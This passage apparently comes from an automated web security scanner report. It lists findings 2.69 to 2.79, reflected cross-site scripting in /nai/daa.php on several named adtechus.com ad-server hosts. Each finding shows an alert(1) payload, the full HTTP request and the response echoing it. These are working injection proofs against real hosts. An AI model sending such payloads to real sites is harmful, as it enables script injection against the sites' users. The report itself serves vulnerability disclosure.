Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai92d21"-alert(1)-"5f3fdab1031/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.69. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 434e7"-alert(1)-"a404150368b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php434e7"-alert(1)-"a404150368b?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSf028c356eb7b44fd5733c118ec85ae5a=3ca60b4948d16cc49de8b9620ef10be8; expires=Tue, 06 Dec 2011 22:26:39 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php434e7"-alert(1)-"a404150368b?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.70. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3e96"><script>alert(1)</script>717794ba805 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpd3e96"><script>alert(1)</script>717794ba805?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSf028c356eb7b44fd5733c118ec85ae5a=9eff81b652f29654dc86c7347099e45b; expires=Tue, 06 Dec 2011 22:26:35 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.ad.us-ec.adtechus.com/nai/daa.phpd3e96"><script>alert(1)</script>717794ba805?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.71. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e38"><script>alert(1)</script>9cc01146ba1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai56e38"><script>alert(1)</script>9cc01146ba1/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS013eb8937f2e90543f6455903b6e96f7=b606b6eb4da635968de931bf5dedcbc7; expires=Tue, 06 Dec 2011 22:26:24 GMT; path=/; domain=.nai.adserver.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserver.adtechus.com/nai56e38"><script>alert(1)</script>9cc01146ba1/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.72. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 408d1"-alert(1)-"e9f2b276e86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai408d1"-alert(1)-"e9f2b276e86/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS013eb8937f2e90543f6455903b6e96f7=a227210b675fde452edf0a9d3f05f19c; expires=Tue, 06 Dec 2011 22:26:28 GMT; path=/; domain=.nai.adserver.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai408d1"-alert(1)-"e9f2b276e86/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.73. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd7fd"-alert(1)-"997f2b094f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpbd7fd"-alert(1)-"997f2b094f6?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS013eb8937f2e90543f6455903b6e96f7=6550fcaafb77abe21189af4eb756cac2; expires=Tue, 06 Dec 2011 22:26:35 GMT; path=/; domain=.nai.adserver.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpbd7fd"-alert(1)-"997f2b094f6?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.74. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea421"><script>alert(1)</script>3f9c4de2114 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpea421"><script>alert(1)</script>3f9c4de2114?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS013eb8937f2e90543f6455903b6e96f7=c29d044e7b3a78184a61e7791180dd51; expires=Tue, 06 Dec 2011 22:26:30 GMT; path=/; domain=.nai.adserver.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserver.adtechus.com/nai/daa.phpea421"><script>alert(1)</script>3f9c4de2114?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.75. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd74e"><script>alert(1)</script>a5e5b0e694d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naibd74e"><script>alert(1)</script>a5e5b0e694d/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSeb6257cf8d54a5bb34f98ba25f6fff13=85f701b2cc26a4618233153f23971d7b; expires=Tue, 06 Dec 2011 22:26:22 GMT; path=/; domain=.nai.adserverec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverec.adtechus.com/naibd74e"><script>alert(1)</script>a5e5b0e694d/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.76. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e976"-alert(1)-"8fdc5e9cf84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai4e976"-alert(1)-"8fdc5e9cf84/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSeb6257cf8d54a5bb34f98ba25f6fff13=a1b06d29d652d70efe95eb36d434513a; expires=Tue, 06 Dec 2011 22:26:25 GMT; path=/; domain=.nai.adserverec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai4e976"-alert(1)-"8fdc5e9cf84/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.77. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b4e"><script>alert(1)</script>caf640b32cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpf5b4e"><script>alert(1)</script>caf640b32cb?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSeb6257cf8d54a5bb34f98ba25f6fff13=4a4fa2e470a7f809ef4716675d39f5fd; expires=Tue, 06 Dec 2011 22:26:28 GMT; path=/; domain=.nai.adserverec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverec.adtechus.com/nai/daa.phpf5b4e"><script>alert(1)</script>caf640b32cb?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.78. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e43c"-alert(1)-"23ca14edc43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php1e43c"-alert(1)-"23ca14edc43?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSeb6257cf8d54a5bb34f98ba25f6fff13=69dca0d14d4964bf69d098e43ffdc3fc; expires=Tue, 06 Dec 2011 22:26:31 GMT; path=/; domain=.nai.adserverec.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php1e43c"-alert(1)-"23ca14edc43?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.79. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3208"><script>alert(1)</script>48076e2b9f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naib3208"><script>alert(1)</script>48076e2b9f3/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS4560b095224b35103826c3de720914c2=ad595d0f028dd0526656759508a224f5; expires=Tue, 06 Dec 2011 22:26:33 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
